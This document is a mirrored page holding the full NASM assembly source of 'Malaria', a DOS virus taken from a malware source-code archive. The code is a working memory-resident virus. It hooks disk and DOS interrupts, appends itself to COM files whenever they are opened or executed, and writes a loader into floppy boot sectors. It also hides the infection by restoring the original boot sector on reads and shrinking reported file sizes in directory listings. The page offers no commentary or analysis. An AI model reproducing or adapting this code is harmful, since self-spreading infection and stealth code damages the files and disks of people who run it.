mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
409 lines
11 KiB
NASM
409 lines
11 KiB
NASM
|
;
|
||
|
;=============================================================================
|
||
|
; [Malaria]
|
||
|
; TSR, parasitic, tunneling, sub-stealth, floppy, COM infecting virus
|
||
|
;=============================================================================
|
||
|
;
|
||
|
|
||
|
virus_size equ (v_end-v_start)
|
||
|
loader_size equ (loader_end-loader_start)
|
||
|
paragraph_size equ (heap_end-v_start+010Fh)/0010h+0001h
|
||
|
|
||
|
.model tiny
|
||
|
.code
|
||
|
.286
|
||
|
org 0100h
|
||
|
start:
|
||
|
v_start:
|
||
|
push ds es
|
||
|
dec ax
|
||
|
int 0013h
|
||
|
inc ax
|
||
|
jz exit_install
|
||
|
mov ax,es
|
||
|
dec ax
|
||
|
mov ds,ax
|
||
|
mov bx,5A4Dh
|
||
|
sub si,si
|
||
|
cmp bl,byte ptr [si]
|
||
|
jz exit_install
|
||
|
mov ax,offset exit_install
|
||
|
delta_two = $-0002h
|
||
|
push cs ax
|
||
|
sub word ptr [si+0003h],paragraph_size
|
||
|
sub word ptr [si+0012h],paragraph_size
|
||
|
mov byte ptr [si],bl
|
||
|
mov ax,word ptr [si+0012h]
|
||
|
mov ds,ax
|
||
|
mov byte ptr [si],bh
|
||
|
mov word ptr [si+0001h],0008h
|
||
|
mov word ptr [si+0003h],paragraph_size-0001h
|
||
|
inc ax
|
||
|
mov es,ax
|
||
|
push ax
|
||
|
mov si,offset v_start
|
||
|
delta_one = $-0002h
|
||
|
mov cx,virus_size
|
||
|
mov di,offset v_start
|
||
|
rep movs byte ptr [di],cs:[si]
|
||
|
mov ax,offset trace_interrupt
|
||
|
push ax
|
||
|
retf
|
||
|
exit_install:
|
||
|
pop es ds
|
||
|
mov si,offset host_bytes
|
||
|
delta_three = $-0002h
|
||
|
mov di,offset v_start
|
||
|
push di
|
||
|
movsb
|
||
|
movsw
|
||
|
retn
|
||
|
loader_start:
|
||
|
mov ax,0B900h
|
||
|
mov es,ax
|
||
|
push ax
|
||
|
mov ax,offset restore_boot_sector
|
||
|
push ax
|
||
|
mov ax,0202h
|
||
|
mov bx,offset v_start
|
||
|
mov cx,'ML'
|
||
|
loader_fix_1 = $-0002h
|
||
|
inc dh
|
||
|
int 0013h
|
||
|
retf
|
||
|
loader_end:
|
||
|
restore_boot_sector:
|
||
|
xor ax,ax
|
||
|
mov es,ax
|
||
|
mov si,offset boot_bytes
|
||
|
mov di,7C00h
|
||
|
push ax di
|
||
|
mov cl,loader_size shr 0001h
|
||
|
rep movs word ptr [di],cs:[si]
|
||
|
mov ax,word ptr es:[0084h]
|
||
|
mov word ptr cs:[int_word],ax
|
||
|
push cs
|
||
|
pop es
|
||
|
mov byte ptr cs:[trace_interrupt_],00C3h
|
||
|
call trace_interrupt
|
||
|
mov byte ptr cs:[trace_interrupt_],00BEh
|
||
|
retf
|
||
|
trace_interrupt:
|
||
|
mov ds,cx
|
||
|
mov byte ptr cs:[trap_flag],cl
|
||
|
mov si,004Ch
|
||
|
mov di,offset i0013hOffset
|
||
|
movsw
|
||
|
movsw
|
||
|
mov word ptr [si-0004h],offset i0013h
|
||
|
mov word ptr [si-0002h],cs
|
||
|
trace_interrupt_:
|
||
|
mov si,0084h
|
||
|
mov di,offset i0021hOffset
|
||
|
movsw
|
||
|
movsw
|
||
|
mov word ptr [si-0004h],offset i0021h
|
||
|
mov word ptr [si-0002h],cs
|
||
|
mov si,0004h
|
||
|
push word ptr ds:[si] word ptr ds:[si+0002h]
|
||
|
mov word ptr [si],offset i0001h
|
||
|
mov word ptr [si+0002h],cs
|
||
|
mov ah,0052h
|
||
|
int 0021h
|
||
|
mov word ptr cs:[dos_segment],es
|
||
|
mov ah,0001h
|
||
|
push ax
|
||
|
popf
|
||
|
mov ah,0019h
|
||
|
call call_i0021h
|
||
|
pop word ptr ds:[si+0002h] word ptr ds:[si]
|
||
|
retf
|
||
|
i0001h: push bp
|
||
|
mov bp,sp
|
||
|
push ax
|
||
|
cmp byte ptr cs:[trap_flag],0001h
|
||
|
jz i0001h_exit_
|
||
|
mov ax,word ptr [bp+0004h]
|
||
|
cmp ax,0D00Dh
|
||
|
dos_segment = $-0002h
|
||
|
jnz i0001h_exit
|
||
|
mov word ptr cs:[t0021hSegment],ax
|
||
|
mov ax,word ptr [bp+0002h]
|
||
|
mov word ptr cs:[t0021hOffset],ax
|
||
|
inc byte ptr cs:[trap_flag]
|
||
|
i0001h_exit_:
|
||
|
and byte ptr [bp+0007h],-0002h
|
||
|
i0001h_exit:
|
||
|
pop ax bp
|
||
|
int_return:
|
||
|
iret
|
||
|
i0013h: cmp ax,-0001h
|
||
|
jz int_return
|
||
|
cmp byte ptr cs:[trap_flag],0001h
|
||
|
jz i0013h_continue
|
||
|
pusha
|
||
|
push ds es cs
|
||
|
pop es
|
||
|
cwd
|
||
|
mov ds,dx
|
||
|
mov ax,word ptr ds:[0084h]
|
||
|
cmp ax,word ptr cs:[int_word]
|
||
|
jz hook_exit
|
||
|
push cs
|
||
|
call trace_interrupt_
|
||
|
hook_exit:
|
||
|
pop es ds
|
||
|
popa
|
||
|
i0013h_continue:
|
||
|
cmp dl,0001h
|
||
|
jnb original_i0013h
|
||
|
cmp ah,0002h
|
||
|
jz i0013h_stealth_boot
|
||
|
pusha
|
||
|
push ds es
|
||
|
cmp ah,0003h
|
||
|
jnz i0013h_exit
|
||
|
i0013h_infect_boot:
|
||
|
mov ax,0BBE8h
|
||
|
mov es,ax
|
||
|
mov ax,0201h
|
||
|
xor bx,bx
|
||
|
mov cx,0001h
|
||
|
xor dh,dh
|
||
|
call call_i0013h
|
||
|
cmp byte ptr es:[bx],00B8h
|
||
|
jz i0013h_exit
|
||
|
mov al,byte ptr es:[bx+0010h]
|
||
|
mul byte ptr es:[bx+0016h]
|
||
|
xchg ax,cx
|
||
|
mov ax,word ptr es:[bx+0011h]
|
||
|
shr ax,0004h
|
||
|
add ax,cx
|
||
|
sub ax,word ptr es:[bx+0018h]
|
||
|
mov word ptr cs:[loader_fix_1],ax
|
||
|
push ax es es cs
|
||
|
pop es ds
|
||
|
mov cl,loader_size shr 0001h
|
||
|
xor si,si
|
||
|
mov di,offset boot_bytes
|
||
|
rep movsw
|
||
|
pop es
|
||
|
mov cl,loader_size shr 0001h
|
||
|
mov si,offset loader_start
|
||
|
sub di,di
|
||
|
rep movs word ptr [di],cs:[si]
|
||
|
mov ax,0301h
|
||
|
inc cx
|
||
|
call call_i0013h
|
||
|
push cs
|
||
|
pop es
|
||
|
mov ax,0302h
|
||
|
mov bx,offset v_start
|
||
|
pop cx
|
||
|
inc dh
|
||
|
call call_i0013h
|
||
|
i0013h_exit:
|
||
|
pop es ds
|
||
|
popa
|
||
|
original_i0013h:
|
||
|
db 00EAh,'PURE'
|
||
|
i0013hOffset = $-0004h
|
||
|
i0013hSegment = $-0002h
|
||
|
i0013h_stealth_boot:
|
||
|
cmp cx,0001h
|
||
|
jnz original_i0013h
|
||
|
or dh,dh
|
||
|
jnz original_i0013h
|
||
|
pusha
|
||
|
call call_i0013h
|
||
|
jc i0013h_stealth_boot_exit
|
||
|
cmp byte ptr es:[bx],00B8h
|
||
|
jnz i0013h_stealth_boot_exit
|
||
|
mov si,offset boot_bytes
|
||
|
mov di,bx
|
||
|
mov cl,loader_size shr 0001h
|
||
|
rep movs word ptr [di],cs:[si]
|
||
|
i0013h_stealth_boot_exit:
|
||
|
popa
|
||
|
clc
|
||
|
retf 0002h
|
||
|
i0021h: cmp ah,0011h
|
||
|
jz fcb_stealth
|
||
|
cmp ah,0012h
|
||
|
jz fcb_stealth
|
||
|
cmp ah,004Eh
|
||
|
jz dta_stealth
|
||
|
cmp ah,004Fh
|
||
|
jz dta_stealth
|
||
|
pusha
|
||
|
push ds es
|
||
|
cmp ax,4300h
|
||
|
jz i0021h_infect_file
|
||
|
cmp ax,4301h
|
||
|
jz i0021h_infect_file
|
||
|
cmp ax,4B00h
|
||
|
jz i0021h_infect_file
|
||
|
i0021h_exit:
|
||
|
pop es ds
|
||
|
popa
|
||
|
original_i0021h:
|
||
|
db 00EAh,'TEXT'
|
||
|
i0021hOffset = $-0004h
|
||
|
i0021hSegment = $-0002h
|
||
|
fcb_stealth:
|
||
|
call call_i0021h
|
||
|
pusha
|
||
|
push es
|
||
|
inc al
|
||
|
jz fcb_exit_
|
||
|
mov ah,002Fh
|
||
|
call tunnel_i0021h
|
||
|
cmp byte ptr es:[bx],-0001h
|
||
|
jnz fcb_continue
|
||
|
add bx,0007h
|
||
|
fcb_continue:
|
||
|
mov ax,word ptr es:[bx+0017h]
|
||
|
mov cx,word ptr es:[bx+0019h]
|
||
|
call hide_dir
|
||
|
fcb_exit_:
|
||
|
pop es
|
||
|
popa
|
||
|
fcb_exit:
|
||
|
iret
|
||
|
dta_stealth:
|
||
|
call call_i0021h
|
||
|
jc dta_exit
|
||
|
pusha
|
||
|
push es
|
||
|
mov ah,002Fh
|
||
|
call tunnel_i0021h
|
||
|
mov ax,word ptr es:[bx+0016h]
|
||
|
mov cx,word ptr es:[bx+0018h]
|
||
|
sub bx,0003h
|
||
|
call hide_dir
|
||
|
pop es
|
||
|
popa
|
||
|
dta_exit:
|
||
|
retf 0002h
|
||
|
_close_file:
|
||
|
jmp close_file
|
||
|
i0021h_infect_file:
|
||
|
push ds
|
||
|
pop es
|
||
|
mov al,002Eh
|
||
|
mov cx,0040h
|
||
|
mov di,dx
|
||
|
repnz scasb
|
||
|
cmp word ptr [di],4F43h
|
||
|
jnz i0021h_exit
|
||
|
mov ax,3D02h
|
||
|
call tunnel_i0021h
|
||
|
xchg ax,bx
|
||
|
mov ax,1220h
|
||
|
int 002Fh
|
||
|
push bx
|
||
|
mov ax,1216h
|
||
|
mov bl,byte ptr es:[di]
|
||
|
int 002Fh
|
||
|
pop bx
|
||
|
mov si,offset temp_buffer
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov ah,003Fh
|
||
|
mov cl,0003h
|
||
|
mov dx,si
|
||
|
call tunnel_i0021h
|
||
|
cmp word ptr [si],5A4Dh
|
||
|
jz close_file
|
||
|
cmp word ptr [si],4D5Ah
|
||
|
jz close_file
|
||
|
push si
|
||
|
lodsb
|
||
|
mov byte ptr [si-0004h],al
|
||
|
lodsw
|
||
|
mov word ptr [si-0005h],ax
|
||
|
pop si
|
||
|
mov ax,word ptr es:[di+0011h]
|
||
|
mov word ptr es:[di+0015h],ax
|
||
|
mov cx,virus_size
|
||
|
cmp ax,cx
|
||
|
jb close_file
|
||
|
push ax
|
||
|
sub ax,0003h
|
||
|
mov byte ptr [si],00E9h
|
||
|
mov word ptr [si+0001h],ax
|
||
|
sub ax,cx
|
||
|
cmp ax,word ptr [si-0002h]
|
||
|
pop ax
|
||
|
jz close_file
|
||
|
add ax,offset v_start
|
||
|
mov word ptr [delta_one],ax
|
||
|
add ax,offset exit_install-v_start
|
||
|
mov word ptr [delta_two],ax
|
||
|
add ax,offset host_bytes-exit_install
|
||
|
mov word ptr [delta_three],ax
|
||
|
mov ah,0040h
|
||
|
mov dx,offset v_start
|
||
|
call tunnel_i0021h
|
||
|
mov word ptr es:[di+0015h],0000h
|
||
|
mov ah,0040h
|
||
|
mov cx,0003h
|
||
|
mov dx,si
|
||
|
call tunnel_i0021h
|
||
|
mov ax,5701h
|
||
|
mov cx,word ptr es:[di+000Dh]
|
||
|
mov dx,word ptr es:[di+000Fh]
|
||
|
push dx
|
||
|
and cx,-0020h
|
||
|
and dx,001Fh
|
||
|
dec dx
|
||
|
or cx,dx
|
||
|
pop dx
|
||
|
call tunnel_i0021h
|
||
|
close_file:
|
||
|
mov ah,003Eh
|
||
|
call tunnel_i0021h
|
||
|
jmp i0021h_exit
|
||
|
hide_dir:
|
||
|
mov si,001Fh
|
||
|
and ax,si
|
||
|
and cx,si
|
||
|
dec cx
|
||
|
xor ax,cx
|
||
|
jnz hide_exit
|
||
|
cmp ax,word ptr es:[bx+si]
|
||
|
ja hide_exit
|
||
|
mov ax,virus_size
|
||
|
cmp word ptr es:[bx+si-0002h],ax
|
||
|
jbe hide_exit
|
||
|
hide_continue:
|
||
|
sub word ptr es:[bx+si-0002h],ax
|
||
|
hide_exit:
|
||
|
retn
|
||
|
tunnel_i0021h:
|
||
|
pushf
|
||
|
db 009Ah,'PURE'
|
||
|
t0021hOffset = $-0004h
|
||
|
t0021hSegment = $-0002h
|
||
|
retn
|
||
|
call_i0013h:
|
||
|
pushf
|
||
|
push cs
|
||
|
call original_i0013h
|
||
|
retn
|
||
|
call_i0021h:
|
||
|
pushf
|
||
|
push cs
|
||
|
call original_i0021h
|
||
|
retn
|
||
|
boot_bytes db loader_size dup (0000h)
|
||
|
host_bytes db 00CDh,0020h,'!'
|
||
|
v_end:
|
||
|
heap_start:
|
||
|
temp_buffer db 0003h dup (?)
|
||
|
trap_flag db 0001h dup (?)
|
||
|
int_word db 0002h dup (?)
|
||
|
heap_end:
|
||
|
end start
|
||
|
.
|